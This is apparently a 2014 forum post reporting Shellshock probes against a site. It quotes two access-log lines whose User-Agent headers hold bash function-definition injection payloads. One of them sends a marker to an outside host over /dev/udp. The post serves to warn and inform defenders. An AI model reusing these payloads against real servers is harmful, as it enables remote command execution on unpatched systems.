More info here: http://www.theregister.co.uk/2014/09...sh_shell_vuln/
Sites are being probed. I found two attempts from this morning here on HTG:
Neither of these did anything nefarious; they just reported back somewhere if the exploit worked. The server is now patched but the patch doesn't fully solve the issue.
Sites are being probed. I found two attempts from this morning here on HTG:
Code:
24.251.197.244 - - [25/Sep/2014:03:33:16 -0700] "GET / HTTP/1.1" 200 24064 "-" "() { :; }; echo -e \"Content-Type: text/plain\\n\"; echo qQQQQQq" 166.78.61.142 - - [25/Sep/2014:08:58:21 -0700] "GET / HTTP/1.1" 200 24064 "-" "() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444"
Comment